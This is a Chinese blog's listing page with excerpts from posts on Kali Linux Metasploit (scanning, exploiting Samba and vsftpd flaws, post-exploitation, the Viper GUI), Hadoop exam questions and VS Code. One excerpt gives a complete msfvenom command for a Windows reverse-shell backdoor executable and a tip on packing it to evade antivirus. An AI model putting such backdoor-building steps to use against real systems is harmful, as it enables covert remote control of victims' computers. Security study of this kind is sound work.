- 博客(29)
- 资源 (1)
- 收藏
- 关注
RSS订阅原创 kali metasploit 后渗透Post模块
如果是获取shell后权限是比较低的,post模块中有一个检测目标系统补丁然后会给出相应exp提权的功能。我这由于没安装火狐导致报错。
2022-10-28 19:08:55
417
原创 kali metasploit 漏洞利用
如果在调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了恶意输入的话,就可能允许攻击者以nobody用户的权限执行任意命令。传递通过 MS-RPC 提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在 smb.conf 中,导致允许远程命令执行。在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“😃”为结尾,服务器就会在6200端口监听,并且能够执行任意恶意代码。不需要身份验证来利用此漏洞,因为此选项用于在身份验证之前映射用户名。
2022-10-28 19:08:09
686
原创 kali metasploit 信息收集
SYN扫描也称半开放扫描。在SYN扫描中,恶意客户企图跟服务器在每个可能的端口建立TCP/IP连接。这通过向服务器每个端口发送一个SYN数据包,装作发起一个三方握手来实现。SYN扫描是恶意黑客不建立完全连接,用来判断通信端口状态的一种手段。这种方法是最老的一种攻击手段,有时用来进行拒绝服务攻击。use auxiliary/scanner/portscan/syn 使用模块。search portscan 搜索portscan模块。show options 查看帮助。1.msf nmao扫描。
2022-10-23 19:47:05
1253
原创 kali metasploit 图形化Viper
11.sed -i “s/VIPER_PASSWORD/$VIPER_PASSWORD/g” docker-compose.yml 把密码写入文件。6.chmod +x /usr/local/bin/docker-compose 赋执行权限。8.mkdir -p $VIPER_DIR && cd $VIPER_DIR 创建文件夹并打开。-o /usr/local/bin/docker-compose 拉取脚本。7.export VIPER_DIR=/root/VIPER 设置目录。
2022-10-23 18:33:05
1199
2
原创 Hadoop 大数据 期末复习题
1下面哪个选项属于大数据技术的“数据存储和管理”技术层面的功能?A、利用分布式文件系统、数据仓库、关系数据库等实现对结构化、半结构化和非结构化海量数据的存储和管理B、利用分布式并行编程模型和计算框架,结合机器学习和数据挖掘算法,实现对海量数据的处理和分析C、构建隐私数据保护体系和数据安全体系,有效保护个人隐私和数据安全D、把实时采集的数据作为流计算系统的输入,进行实时处理分析我的答案:A2下列哪个不属于Hadoop的特性?A、成本高B、高可靠性C、高容错性D、运行在Linux平台上我的
2021-12-22 08:25:11
28164
2
原创 kali metasploit 制作后门程序远程操控基本使用方法
kali metasploit制作后门程序远程操控基本使用方法1.后门程序的制作与加密后门的实质就是木马msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.34.53 lport=10000 -f exe -o biyu.exelhost后面加的是本机ip,lport后面加的是想要打开的端口号执行后会在本地生成一个biyu.exe的文件如果直接上传到win系统会被杀毒软件杀掉,我们可以用自己的电脑对其进行一个加壳操作。下
2021-12-03 10:22:29
4158
原创 VScode用法讲解
首先,安装好VScode。打开后应该是这个样子。点击文件-新建文件,或者使用快捷键Ctrl+n。这时候记得一定要Ctrl+s保存一下,保存成.html的格式。.txt改为.html为什么呢这里解释一下,改为.html的形式,打一个叹号再按Tab可以直接出现格式。切记英文叹号。接下来是一些配置包。这位四个包下载下来。开始时候你们的可能跟我不太一样,不过不要紧,因为第二个就是把语言变成中文。优先下载2.0.0点这里,如果运行不了,点设置切换到1.0.0版本这里记得下完配
2021-01-25 16:22:04
606
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人